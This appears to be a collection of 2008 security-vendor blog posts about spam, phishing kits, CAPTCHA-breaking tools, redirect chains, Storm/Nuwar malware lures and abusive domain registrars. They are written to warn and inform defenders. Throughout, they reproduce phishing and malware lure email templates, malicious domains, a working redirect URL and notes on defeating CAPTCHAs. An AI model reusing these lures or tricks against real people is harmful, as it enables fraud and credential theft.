Also on Thursday, the Dmitri Alperovitch talk grabbed my attention, and I did not hesitate to congratulate him after his presentation. The subject was “Organized Online Criminal Enterprises: Profile of Who, Where, and How.” Alperovitch offered an impressive list of criminals from Eastern countries (with supporting photos) involved in all sorts of cybercrime. It is easy to understand why the Alperovitch presentation now available on the Internet has many deleted sections. Seemingly, the crooks are all Russian or Ukrainian; and of course they use WebMoney. His example of stock manipulation was also very explicit. With some professional spammer tools and an Internet application able to manage “Exact Buy/Sell signals,” Alperovitch demonstrated that it is not difficult for a crook to make money. In his example, the “buy” flag for a peticular penny stock was fixed to $3.45 and the “sell” flag was set between $3.90 and $3.95. When the spammer launched his campaign, the stock cost about $3. The whole deal took just 8 hours, from purchase to sale. By manipulating 100,000 shares, the profit reached $50,000.

Now I am heading home to France preparing to inform my family about all the interesting and festive events I saw. See you next year at FOCUS’09!

I am in Las Vegas for the McAfee Focus ’08 conference, and I just heard that French President Nicolas Sarkozy suffered, in September, a case of online bank fraud on one of his personal accounts.

Authorities said hackers were not aware of the identity of the owner of the account. We know only that they removed small amounts of money (an anonymous well-informed source told Agence France Press it was for opening mobile phone accounts). Perhaps by taking small amounts the crooks wished to ensure the validity of the stolen information and wished to verify the victim’s lack of concern. But they couldn’t have picked a worse target. The entire French police force is chasing them.

It is difficult to imagine my president as victim of phishing, but anybody can be attacked by crimeware while browsing the Internet via a not well protected computer. Remember, it is not necessary to visit inappropriate web sites to catch malware. In December 2007, for example, I explained in this blog that the site of the French embassy in Libya was affected by an IFRAME injection.

The most probable origin of Sarkozy’s identity theft is “carding.” As I wrote in May, dump tracks lists are for sale by the thousands, and many hacked credit card readers are on the market. Perhaps one of them involved Sarkozy’s credit card during one of his numerous foreign travels.

Relating to this fraud, Luc Chatel, secretary of state for consumer affairs, said there has been a 9 percent increase in Internet banking crimes this year in France.

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 - What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

We’ve already written about CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), the mechanism used to protect web sites, forums, and mailing systems against the automatic creation of accounts and contents. As my colleague Tad Heppner wrote in his November 2007 post, most common CAPTCHA systems work by generating distorted characters, text, or pictures that can be easily recognized by the human brain but present significant difficulty for computer-based optical character recognition or other image-recognition systems.

It should come as no surprise, however, that spammers continue to try to crack CAPTCHA. We’ve now seen a new version of a professional spammer tool on the web. XRumer 5 sells for $520 and promises advanced CAPTCHA decoding methods.

For a long time spammers have searched to defeat CAPTCHA mechanisms to create fake email accounts to send spam. Before telling you more about this new crooked utility, let’s review some older techniques used by spammers.

As shown in the following image (source XMCO), the most common CAPTCHA methods can be broken.

The first method of cracking is manual. People from developing countries offer services. The competition is intense. On some dedicated forums, proposals surge in from Vietnam or Bangladesh. They claim that lots of people are ready to work 24 hours a day to process hundred of thousands of CAPTCHA. Rates vary from $8 to $1 per 1,000 CAPTCHA.

A less expensive solution consists in using private individuals to do the work free of charge. I am sure some readers remember this unusual offer, in which it was possible to undress “Melissa” in exchange for some CAPTCHA work. This allowed a spammer to create fake Yahoo Mail accounts.

It is also possible to find free web services. The CAPTCHA Killer web site offers such services. Its designer claims the offer “is 100% focused on increasing accessibility on the Internet” for the “1 Million Americans that suffer from blindness.” The service makes available an API to automate the process. However, I was not surprised to read a cross-reference on that site saying they have been notified that using CAPTCHA Killer with Myspace was against the latter’s Terms of Service.

A very technical approach uses rainbow tables, in which each CAPTCHA image is associated with its character string. In March 2008, someone nicknamed Maluc created PHP scripts to download, extract, and save thousands CAPTCHA images from Yahoo, Google, and Hotmail. When finished, each collection will help spammers create new recognition tables or verify the accuracy of its OCR algorithm. When successful, only one millisecond is needed to compare a new footprint with the ones included in the database. You have to pay between $1,500 and $5,000 for such algorithms, which suppress the noise, create a black-and-white picture, break it into segments (one letter per segment), and identify the character.

A programmer called Wangrun in the Chinese province of Anhui says he developed software to decode CAPTCHA systems. Depending on the complexity of the CAPTCHA image, he charges between $500 and $6,000 per decoder. No price is quoted for the most difficult images but, in a comment, he writes it is feasible. Wangrun declines to say what his customers use the decoders for, but says he has “very many” of them.

Spammers can also use zombie machines to help them crack CAPTCHA. We’ve read on the Virus Bulletin web site that compromised systems making up a large botnet were recently used to help in the registration process for Windows Live Mail accounts. When the bot (detected by VirusScan as Generix.dx) asked for registration, it received a CAPTCHA and immediately presented its image to a central server that attempted to decode it and returned the result. The decipher technique was successful only around 35 percent of the time, VB said, but a new idea was launched. The fact that large numbers of infected systems were running repeated attempts suggests a high number of new accounts for spamming were created at that time.

Finally, turnkey tools are another method for defeating CAPTCHA defenses. XRumer 5 is one of them. It can flood message and links forums, guestbooks, blogs, wikis, etc. It automatically finds and fills in required fields with no need of a browser. If the forum requires registration, the program will register, log in, and post the spammer text. XRumer goes beyond JavaScript protection, pictocode protection (typing a number displayed in a box), and protection by e-mail activation. If a CAPTCHA image is detected, the program automatically downloads it, analyzes it, and fills in the form.

Version 5 can work on most recent versions of popular engines such as VBulletin, IPB, and phpBB, according to its creator. XRumer can also create accounts on gmail.com for posting. And its clients seem happy. One of them wrote last week on a forum “all that for only $500? It’s very cheap! I’d easily charge 2k for that. Solving gmail captcha is no joke. I paid 4k just for that from an OCR developer. …”

XRumer is also able to solve the “pick the cat captchas” presented in picture below.

On October 3, XRumer’s maker explained he analyzed many forums and discovered that most of this type of CAPTCHA used identical pictures. Thus XRumer can distinguish them by their sizes in bytes. And it concludes: “It’s so easy, isn’t it? Oh, they can make some distortion on images? Well, we have a time to improve our algorithm. We analyze forums, blogs, guestbooks permanently, and there is one important thing: that type of captchas used not more than 0,01% of resources (1 of 10,000 sites).”

Once again, we are reminded that malware design is a business. And once again, my searches drive me to Russia, where criminals create and employ malicious software as well as engage in identity theft and virtual prostitution. The company or individual behind XRumer appears to be the same as that which proposed an automated sex-talk service called CyberLover.ru in 2007. One name I got from a whois request today is Alexander Ryabchenko. When the media pointed the finger at him in 2007, Ryabchenko emailed to Reuters that he could not be accused of identity theft with the CyberLover concept. He explained “the program can find no more information than the user is prepared to provide.”

If anyone should ask Ryabchenko why he commercializes XRumer, I suggest he repeat the CAPTCHA Killer web site argument: to help the million people suffering from blindness.

Q: How do you want to build a client base for your phishing kits?
A: Give the popular ones away for free. Yes FREE, and as blatantly as possible, with one-click satisfaction, right on the homepage of a web site.

I suspect that this is a shareware-style, lead-generation setup–as the phishing kits appear to be of relatively poor quality. (So poor in fact that I expect the most experienced brands to be sending takedown notices for them before the phishing emails were actually sent.) Some of the kits also appear to have encoded parts indicative of being backdoored, too–I guess they gotta pay the hosting bill somehow!

Kudos to the host in Germany for taking down the site next day; you know who you are.

223ad6770c4ff635083b70391d3c04de Abbey[1].Co.Uk.zip
f34e8ce8e373796a30dc7e0730c4ed9e Bank of Israel (2008).rar
799c1ba68e87a33aa225655931996f1f BankofAmerica[1][1].Com.zip
76282eea7ab203c51b05c660577a4002 Cahoot[1].Co.UK.zip
880a57f271d4d46da92738e3962e49b1 E-Gold[1].Com.zip
fa1a96c0b1927177b2ca2c8bd6c5e970 HSBC[1].Co.Uk(CC Info).zip
376bd1c17baa77a870e12747338fe64a HaliFax[1].Co.Uk.zip
a190290c4643d95fb87537856474e84f LloydsTSB[1].Com.zip
0c23bed37791a123e7635cef153d21f9 MoneyBookers[1][1].Com.zip
c5d10b25075e4298bf098dc253a408e6 New paypal.rar
ad7e3dd00939eb5e8d56092aaa0e24bc Padeel.rar
499626e041c80bdec9f80be29364b1b7 PayPal[1][1].Com(T).zip
5eec8797fc8174bf432ddce192d1b1d4 PayPal[1][1].Com.zip
89e94a1843c25dc6424cf542573a4b01 UsaBank[2008].rar
36be827f4ee6e494ee1935556ab3a2a7 Wachovia[1].Com.zip
e1ba19f799d604656ebd4dd9c8228913 Westren nion 2008.rar
62f99023b12214ecac05cdf0ad0b82fe ibank.barclays.co.uk2008.rar
ee89d38f27deb6c94391c764913d9490 scams-orange.zip
afcef45174c5b1ec54db3e8bccfd285a usa.visa.com.rar
6c9030c9c5af0b9343ef72eb458641fd www.Free.Fr.rar
66671d90a86f618522a64caba5bc91a8 www.ebay.co.uK2008.rar
dbfb0c80bada183e47ae031ebb535116 www.paltalk.com.rar

There is an interesting back story to this incident, too: All roads of further investigation lead back to France. The details of which have been with the national police for some time now (thus the delay in posting).

The casino spammers have been chaining together a lot of link redirectors recently to avoid being taken down by redirector sites checking anti-spam blacklists.

Here is a good example from one of our partner traps of how you go from one of the most popular torrent forums on the web to a Malta-based casino in one click.

This is the URL used in the email and our starting point:
http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h

Here is the redirection chain:
http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h
--> 301 Moved Permanently

http://www.demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h
--> 200 OK (and stops if you’re using LWP)

HEADER : Refresh: 0;url=http://tinyurl.com/4nr46h

GET http://www.spinpalace.com/index.asp?a=634991
--> 301 Moved Permanently
(then they hide the affiliate string for some reason)

GET http://www.spinpalace.com/
--> 200 OK

Affiliate 634991, your time is up.

This is not a new trick. Forward-thinking anti-spammers have been reputing against this type of behavior for quite a while, coupled with generic redirector detection. (This mail was three times over our usual deletion threshold.) The issue lies in the fact that some of these links stay alive for days, as it takes a long time and a lot of effort for the redirect sites to clean up the working redirectors. Spammers don’t re-try tricks like this without reason, however.

If any readers are going to be at MAAWG next week, be sure to say “Hi”!
(Slacker Ed. is going too!)

People don’t seem to seriously care about Wi-Fi security yet. Inspite of oft-repeated warnings, ignorant folks with unlimited bandwidth plans believe that they are doing a social service by allowing neighbors to leach their Wi-Fi freely. What they fail to understand is that by doing so, they can become an unwitting accessory to cyber crime.

Instead of scouring for anonymous proxies to stay faceless on the internet, cyber criminals are increasingly targeting unsecured Wi-FI networks to get the job done. A combination of war driving tools such as NetStumbler along with a listing of default router usernames and passwords is all it takes to freely connect to unsecured Wi-FI networks. Especially since most Wi-Fi routers use default security settings that come pre-installed by the vendor rather than it having being configured by the end user.

SOHO routers log every connection and DHCP lease but these logs are flushed once the router is rebooted. If an attacker has access to the administrative console of the router (thanks to the default password), once their nefarious actives have been carried out, a simple restart of the router will erase all tracks.

The extent to which an unsecured Wi-Fi connection can be abused is purely left to imagination of the attacker. Putting on my Dr.Evil hat, here are couple of wicked acts a Wi-Fi hacker could commit and get away undetected using an unsecured network.

• Download child pornography
• Download copyrighted movies and music via P2P
• Download Warez and abuse your bandwidth
• Send bomb hoaxes, terror or threatening emails.
• Send spam (sexual aids, pharmacy or money laundering scams)

Any of the above acts could lead to law enforcement authorities knocking on your door. This is not mere speculation and many unsuspecting people have fallen victim. To quote a high profile example, in the recent serial bomb blasts in India, terror emails that took responsibility for the blasts were sent from unsecured Wi-Fi connections. And it was the unfortunate owners of the unsecured Wi-Fi connection that were subjected to police questioning and house arrest.

In addition to using an unsecured Wi-Fi network for malicious purposes, an attacker can also use it to steal personal information for identity theft. For example:

• Infiltrate and break into internal machines
• Modify DNS settings on the router to point to a rouge server.
• Sniff Wi-Fi traffic for usernames and passwords

The above discussed scenarios are neither speculation nor an exhaustive listing of different ways for abusing unsecured Wi-Fi networks. These scenarios are being enacted by criminals everyday around the world.

Now why would want to be an unwitting host to criminal activities emanating from your IP address or make yourself vulnerable to identity theft? Be a responsible Netizen and please secure your Wi-Fi connection now!

Inspired by Igor’s post (and whilst Terry is dancing in doorways) I’ve taken some time out from my current project and beaten a path through the tangled web of service providers, registrars, resellers and registrants of the domain name system supporting the darker side of the web.

This investigation originally started when Garth from Knujon pointed out that Directi have some shill registrars on their books (Whilst I was enjoying the Kaiser Chiefs @ Rock en Seine in Paris no less). I then read Brian Krebs post about Atrivo being one of the best known dangerous networks around… He finished with a teaser note about ESTDomains. So guessing whats coming next I’m going to jump the inter-networking gymnastics that binds EST with Atrivo/Intercage/(cernel|inhoster)/Etc, privacy services and others and start at the far end of the story and expose a secret about a not-so-little Indian company called Directi and shine a light on the almost invisible but vital service that powers the domain registration core of the largest group(s) of bad-actors on the web today.

Let me provide some bullet points about the Directi Group of companies to get you up to speed.

• Directi are a privately owned Indian company with a reported turnover in excess of $300M USD.
• Directi own LogicBoxes the maker of a product used to manage the registrar relationship with registries.
• Directi own the reseller Resellerclub.com, and the registrar Answerable.com amongst others.
• Directi own skenzo.com a domain typo squatting monetization service.
• Directi’s Logicboxes are responsible for over 3.5M domains, about 45K resellers across 50+ ICANN accredited registrars.
• LogicBoxes has no acceptable use policy (AUP) for their service.

That last point is the weak link in the chain. Directi’s Logicboxes provide domain registration automation services under contract but without an AUP, and to organizations that have an un-holy tie to organised crime at that.

LogicBoxes is a software product or turnkey ASP solution but some simple tests (that I’m deliberately withholding for now) prove that it’s software combined with a backend service and Directi are involved at every stage of the game via it’s service-layer even though it looks on the face of it like they aren’t.

(If you don’t understand the cats-cradle of knotted string that holds the domain name registration system together then blame John Levine as he has admitted it’s all his fault and this slide explains it all, “apparently” ).

So on the the murky world of Registrars also being Resellers and why:
ESTDomains, Dynamic Dolphin, to name but a few are huge Directi resellers, and as ICANN accredited registrars also customers of LogicBoxes too. But as Garths and Brian’s posts show there are also many other “shill” registrars and unanswered questions too. However between them they provide a disproportionate amount of domains that are used for illegal activities and most have a path back to Directi’s logicboxes service. I’d estimate the total to be north of 100,000 domains by now, everything from Social networking spam through illegal pharmaceutical supply to botnet command and control.

There is a metric truckload of publicly available evidence for anyone that still doubts the darkness of their hats take a look at the URIBL listings for the last 5 days for ESTdomains. All the linked domains are sites you do not want to click as they contain spam landing pages, fake anti-mailware, porn with fake codecs amongst other things. Why on earth a legitimate registrar would not monitor uribl’s published information and act on it is completely beyond me.

ICANN don’t help the situation by accrediting registrars without a verifiable legitimate address and well publicized & working contacts. We have procurement and vendor qualification processes that’s a real pain some times excellent IMHO, I’ll ask someone to send them a copy

Our friends at Spamhaus have plenty to say about ESTDomains too on many listings, take a look at their nameserver listings for starters SBL53320 SBL53319. Searching ROKSO will reveal a whole lot more. As for Atrivo, it’s a rats nest of issues; A rats nest that would do well to fall off the internet. For more information on the internet-gymnastics I jumped over take a look at this great pdf from hostexploit.com. Keep in mind though that some of the feeder transit networks may be owned or run by the same gang and just exist for redundancy.

The ESTDomains that I’ve investigated first hand have generally fallen into two camps, one where they are registrar directly and one where PublicDomainRegistry is mentioned in the whois, the latter being the “shill” sorry I mean “white labeled Registrar” for the previously mentioned Directi company “resellerclub dot com“. The fact that PrivacyProtect.org is Directi’s whois privacy service (pasted from here) for resellers just makes matters worse.

Don’t get me wrong, Directi have a clue, register a domain directly with a Directi owned registrar and break the AUP and they will act well as any registrar must. I’m specifically talking about the other services they provide to the criminal corners of the web.

It would appear too that the ESTDomains portfolio has had their privacy protection revoked too, this is definitely a step in the right direction. (Breaking news this evening from El Reg and knujon, nice work guys) However, these guys move pretty fast and recently EST moved their privacy needs to their own protectdetails.com domain.

So finally I have to ask those making money by providing the core services Bhavin Turakhia & Divyank Turakhia from Directi, you clearly know the score, so when will you completely stop supporting the illegal acts of EST, DD and other very obvious darkside entities and kick the bad apples out?

Before anyone from a registry or registrar starts the classic “Smith & Wesson” rant think about this, “Smith and Wesson” don’t sell maps or cars, drive you to the forest, apply your camouflage, help with your ICANN accreditation or load your gun for you

Last night we blogged about fake invoice spam carrying malware.  Unsurprisingly those behind the recent attacks continued today with new spam campaigns involving airline ticket invoices.  Messages may appear as follows (other spam campaigns may appear different):

—————————–
From: [name] [airline_name] Airlines
Subject: Your order from {airlines} [number]
   or
Subject: Online order for flight ticket [number]
Body:

Hello,
Thank you for using our new service “Buy airplane ticket Online” on our website.
Your account has been created:

Your login: [characters]
Your password: [characters]

Your credit card has been charged for $[number in the $400 range]
We would like to remind you that whenever you order tickets on our website you get a discount of 10%!
Attached to this message is the purchase Invoice and the flight ticket.
To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards,
[name]
[airline]

Attachment: E-ticket_[number].zip (containing an executable, which may have a Word document icon).
—————————–

As with previous campaigns, the executable is a new variant of Spy-Agent.bw.  Once again, Avert Labs reminds readers to practice safe computing, and never to open unexpected email attachments, or follow unexpected URLs; especially from unfamiliar senders.

On July 15, we sent out a Security Advisory including Generic Downloader.ab (MTIS08-131-A).  This covered a Trojan variant that was mass spammed, purporting to be a UPS invoice.  Since then we’ve seen a number of subsequent mass spammings carrying new variants of Spy-Agent.bw, The email message content is similar to the original spam:

———————————-
From: “United Parcel Service”
Subject: [RE] UPS Tracking Number [number]
Body:

Unfortunately we were not able to deliver postal package you sent on July the 1st in time because the recipient’s address is not correct.
Please print out the invoice copy attached and collect the package at our office

Your UPS

Attachment: UPS_INVOICE_[number].zip or invoice_[number].zip
———————————-

Over the past 24 hours we’ve seen other spam runs from “Customs Service” with the attachment “Tax_invoice.zip” as well as “Bill_Tax.zip” attachments from “US Customs Service” and “Rechnung.zip” from “WG: Lastschrift [number]“.  The zip attachments contain .EXE files.  In order for infection to occur users must open the attached ZIP and then choose to run the executables manually.

Product coverage is being updated for new malware variants as necessary and a follow-up security advisory will be sent soon.

These spam runs may continue over the next few days.  Avert Labs reminds readers to practice safe computing, and never to open unexpected email attachments, or follow unexpected URLs; especially from unfamiliar senders.

Recent phishing attempts have been targeting some popular social networking sites and jobs websites, such as facebook.com and monster.com. Due to the amount of personal and sensitive information which is saved there, they are very valuable to phishers. This data could be used to further target or spear phish individual victims by name and even work interests.

We have seen phishing attacks which targeted careerbuilder.com in the past. The latest target is another big recruitment site - monster.com. Just like typical financial phishing emails, the Monster phishing emails have subjects including imperatives like “Monster customer service: important notice” or “Monster customer service: please confirm your data!”

But please do not be fooled! These are not from Monster at all!!

The phishing domain would appear to be hosted on a new UK domain with dns leading to a bot in Turkey. We can see from this phishing site, the phisher is mainly targeting recruiters for their logins and passwords. This would enable them to access hundreds or even thousands of job seekers’ CVs which often contain a gold mine of sensitive data. Other elements of the recruiters account could be useful as well.

The level of personal data on a CV is pretty high, and in the wrong hands outright dangerous. Be vigilant against unsolicited emails!

Just when you were wondering what the Storm worm authors could come up with next after using 4th of July theme as bait for their last spam run, Nuwar has now resorted to a war theme. The authors have cleverly chosen to exploit the escalating political tensions in the Middle East between Iran and the United States over Iran’s threat to attack Israel in response to any military action on its nuclear facilities. Some of the subjects observed in today’s spam are:

The beginning of The World War III
US Army crossed Iran’s borders
US Army invaded Iran
US soldiers occupied Iran
USA attacked Iran
USA declares war on Iran
USA unleashed war on Iran
War between USA & Iran

This is not the first time Nuwar has used a war theme. Incidentally, McAfee christened the Storm worm as “Nuwar” because it used the sensational war theme “Nuclear WAR in USA!” when it first appeared. Since then the authors of Nuwar have used and re-used morbid and shocking themes religiously with every new spam run. These themes sometimes get repeated when that time of the year approaches and this one is no different. War themes have been seen in previous Storm worm campaigns dating back to Nov 2006 & Apr 2007.

Unsuspecting users who follow the link in the spammed email are directed to a Storm bait page hosting a video that purportedly shows the first minutes of the beginning of World War III. Except that clicking the video would download “iran_occupation.exe”. And in case a user wanted to know about the advertised Patriots and Veterans Programs they would end up downloading “Form.exe”.  Both files are detected as W32/Nuwar@MM with McAfee’s latest beta dats.

The Storm bait pages are currently being hosted on the following fast-flux domains.

dailydotnews[.]com
dotdailynews[.]com
morenewsonline[.]com
newsworldnow[.]com
statenewsworld[.]com

The above mentioned domain names have be sanitized in the blog and readers are strongly advised not to attempt to visit them as they host a cocktail of exploits that attempt to infect a visiting machine. This information is being provided for administrators to take pro-active measures and block access to the rouge domains.

On July 1 we released the results of our S.P.A.M (Spammed Persistently All Month) Experiment, in which 50 people from around the world surfed the Web unprotected for 30 days. By taking part in the experiment, participants were given permission to go where most Internet users would not dare, in order to discover how much spam they would attract and what the effects would be. Go everywhere we have told you not to go. Click everything we told you not to click. We then studied the daily blogs and analyzed the spam itself and confirmed that spammers are as active as ever; they are increasingly using psychological tricks to lure Internet users to part with their contact details, identity information and cash. The experiment (the first of its kind) clearly shows that spam continues to evolve, utilizing more local languages and cultural nuances, as well as becoming much more targeted in a bid to avoid detection.

Our brave and bold participants were assembled from 10 countries and by the end of the 30 days they received more than 104,000 spam emails–that’s an average of 2,096 messages each, the equivalent of approximately 70 messages a day.

Many of the spam messages received were phishing emails: emails that pose as a trustworthy source to criminally acquire sensitive information such as usernames, passwords, and bank account details. Other emails carried viruses, and many allowed malware to be silently installed on the computers by persuading participants to surf unsafe web sites. A number of participants noted a decrease in their computer’s processing speed, as well as an increased number of pop-ups.

The Global ‘Spam League’:

1. United States 23233
2. Brazil 15856
3. Italy 15610
4. Mexico 12229
5. United Kingdom 11965
6. Australia 9214
7. The Netherlands 6378
8. Spain 5419
9. France 2597
10. Germany 2331

To read more about the participants experiences, go here
and make sure you download the ‘Global Spam Diaries’ as well.

We often read that scam and phishing attacks are more and more complex. I agree… if we deliberately omit the various phishing kits available from the internet, which are usually not very sophisticated! This weekend I got yet another phishing email scam on my personal email address. This one targets Paypal users and specifically Paypal France since it is written in French. I thought that could be a perfect example to dissect in order to highlight the suspicious parts of its content.

So here is the email body:

First thing to notice: the use of “Cher client Paypal”, which means about the same as “Dear Paypal member” and is a formal way, but also a very non-specific way, to start a mail. Paypal always uses our real name in the beginning of its mails, so any email that appears to be sent from Paypal that starts with such common sentence is suspicious. Moreover we use accents in French, and although it is written in French, there is no accent at all. Worse, there are many grammatical errors. Paypal is a big company, and I find it highly unlikely that they don’t have people who can write French properly! So, just the reading of the email body should be sufficient to encourage us to drop it in the trash bin.

But let’s see the subtler parts now.

The email asks us to click on the button “Activer” in order to re-activate our Paypal account (which has never been deactivated obviously). But as you can see in the following screenshot, the button does not point to the Paypal.fr website but it is linked to  the domain falomensdepeyy.com, although “www.paypal.fr” appears in the URL in an attempt to confuse people. A Very typical tactic!

And last, but not least, let’s look at the email header:

The content of the entry called “X-WEBC-Mail-From-Script” is the proof that this email was sent with a script located at http://www.alkasterdesese.com/mailer1.php, which has nothing to do with Paypal’s website! Although the “From” field contains the correct sender “service@paypal.fr”, we are now sure that this email did not come from Paypal.

At the time of writing, both sites located at alkasterdesese.com and falomensdepeyy.com are shut down.

Additionally, Michael Barrett from PayPal has posted an excellent blog on how to spot scams.

There mustn’t be much going on in the world today as the Nuwar spammers have moved from jumping on real news of natural disasters and current affairs to creating their own fictional events! This high volume spam campaign is using some wacky subjects to lure people into clicking on the links:

Subject: Britney found hanged in locker room
Subject: White House hit by lightning, catches fire
Subject: Oprah found sleeping the streets
Subject: Eiffel Tower damaged by massive earthquake
Subject: Donald Trump missing, feared kidnapped
Subject: Lastest! Obama quits presidential race

This clever social engineering technique plays on peoples inquisitiveness in news of natural disasters and celebrities. The emails also follow the simple format of some text and a link that looks fairly harmless to the uneducated user.

All the links go to a fake pornotube page hosted on legitimate sites that have been hacked. If you click on the video (that’s actually just an image) it tries to download a .exe file. This is detected as BackDoor-DNM and the spam is also currently detected with our Anti-Spam products.

So it goes without saying.. NEVER click on links in an email unless you are sure of its origin, keep your Anti-Virus software up-to-date and if you have a website make sure its properly secured so you’re not hosting stuff like this.

Nuwar families are known for using social engineering to trick users to download themselves. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic - Beijing earthquake (Not Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it. This page has the iframe link to a malicious javascript.

Upon accessing the above page, the obfuscated javascript is downloaded and run because of the injected iframe. The JavaScript exploits the realplayer vulnerability CVE-2008-1309 and download another variant of Nuwar.
McAfee VSE blocks the script and detect as “JS/Exploit-Shell.gen”.

At the time of writing, the download file was corrupted.

There has been some debate in anti-phishing circles over what a hosting service provider should do when taking down a phishing site. It boils down to one of three basic actions the victims witness.

• Redirect the hits to the brands legitimate site - This in my opinion is a dangerous thing to do on many levels and any brand requesting this action will feature on a follow-up shortly.
• Remove the site and throw the 404 error - Just stopping the site working and having the browser present a standard error is the standard check-box reaction & minimal effort.
• Use the hit as an opportunity for education - This is by far my favored option (even though I’ll play devils advocate when it’s discussed). Once a victim has fallen for a phish email, help them to help themselves in the future with some easy to understand education.

Education has to be appropriate, I’m not suggesting at “click time” is a good time for presenting the user at the Anti Phishing Phil game for instance. (Phil is great though if you’ve never seen it). “In your face” education at click-time is a topic close to the heart of the APWG, they will present their advice on the topic very soon.

So back to the raison d’être of this blog, a 10 gallon hat tip to AT&T for this great vishing takedown. [Listen to the mp3]*. They’ve raised the bar with this one and deserve some hearty kudos. I can’t think of a better way of dealing with a vishing number. The continuous unavailable tone has no place here since it’s easily confused with mis-dialing ^{(Homer mp3)}. They have replaced the disconnected service with a great education statement and sound advice too if the caller thinks that they were a victim.

^{* The quality is much better on the phone, I used our conference bridge to record the example.}

A few days ago I was browsing a forum while I read a message from someone saying that he received a strange link from one of his MSN contact list, which was formed like the following:

http://[MSN_login].flatl1n[removed].info

This domain hosts a webpage asking for MSN logins and passwords and pointing to another webpage asking for ICQ login credentials:

But let’s examine this page in details, especially the “Terms of Use” for example:

“Terms of Use / Privacy Policy:

By filling out this form, you authorize TST Management, Inc to spread the word about this 100% real and upcomming Messenger Community Site.
You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties.
By using our service/website you hereby fully authorize TST Management, Inc to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a “phishing” site that attempts to “trick” you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT, DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.

We may temporarily access your MSN account to do a combination
of the following:
1. Send Instant Messages to your friends promoting this site.
2. Introduce new entertaining sites to your friends via Instant Messages.”

Oh well, that reminds me how social engineering is powerful…
The victim received this URL from who is supposed to be one of his MSN contact and it is unlikely he will spend a few minutes reading those lines. So I agree, everything that the attackers do is published inside the Privacy Policy, but I disagree when they say that they don’t “trick” people to get their login credentials: they use social engineering attacks to get users’ passwords, this is dishonest and this is phishing scam!!

Now, here is the funny part of the “Terms of Use”:

“This is a free service. You will not be asked to pay at any time.
You will not be subscribed to anything asking for payment.
This service is made possible by many hours of human effort.

TST Management, Inc reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference.”

So ironic…
And the last part, the one that aroused my curiosity:

“You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, TST Management, Inc is NOT agreeing to MSN’s terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.

If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not effect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.

Copyright 2008 TST Management, Inc”

I was wondering if this website was effectively hosted in republic of Panama, but a whois of the domain informed me that the IP address is located in Hong Kong actually:

The Reverse IP field says there are 32 other sites hosted on this server (210.56.53.224).
And we can see also that “TST Management, Inc” (who is the registrant of the domain), owns 412 other domains.
So I decided to do a Google search and I wasn’t surprise to notice that they are apparently used to phishing scams!
“TST Management, Inc” seems to be another name for the “Blue China Group Ltd”, the one that was sued by MySpace last year for mass spamming.

I managed to create a screenshot of the old “Mass Comment Poster” website that belonged to them:

We can see that the Terms of use were very cynical too!!

They also host what they introduce as a MySpace tracker (called “Stalker Tracker”) which is in fact another phishing scam website:

Besides the website displays another “typical” Privacy Policy mentioning:

We may temporarily access your MySpace account to do a combination
of the following:
1. Post bulletins to your friends promoting stalkertrack.com.
2. Post comments to your friends promoting stalkertrack.com.
3. Post a blog about our upcoming tracker for your friends to read.
4. Customize your blog header html with a clickable stalkertrack.com ad image.
5. Send a batch of blog invites on your behalf.
6. Send IM invites with a personalized stalkertrack.com message and/or image advertisement attached - to your friends and potential friends and other members.
7. Introduce new entertaining sites to your friends via comments, bulletins, and messages

And guess how can they do that? Once again, just by using the login credentials entered in the form…

Last but not least, once the login credentials are submitted via the phishing scam MSN/ICQ web pages, a PHP script is called to increment an online counter, and here are the statistics available at the moment:

This counter seems to supervise the activity on all their phishing websites, not only on a couple of them.

We can see that 92 people were reaching one of their phishing scam websites when I was looking at the statistics, they were 35334 unique visitors yesterday, 284746 visitors since the beginning of June, 3616516 visitors last month, and 7031582 visitors since this counter has been created (since February/March 2008 according to the second screenshot).

Be vigilant of such IM messages and websites marked as “copyright” to “Blue China Group, Ltd” or “TST Management, Inc“. Whatever the website purports to be they are certainly requesting your login credentials in an unclear way!!

I was at the APWG CeCOS II conference in Akasaka, Tokyo, Japan the last two days. It was encouraging to see many members from not only academics, security vendors, and anti-phishing groups but also many law enforcement agencies including Interpol, Kyoto Prefacture Police amongst others. There were also several presentators from the Online Gaming community.

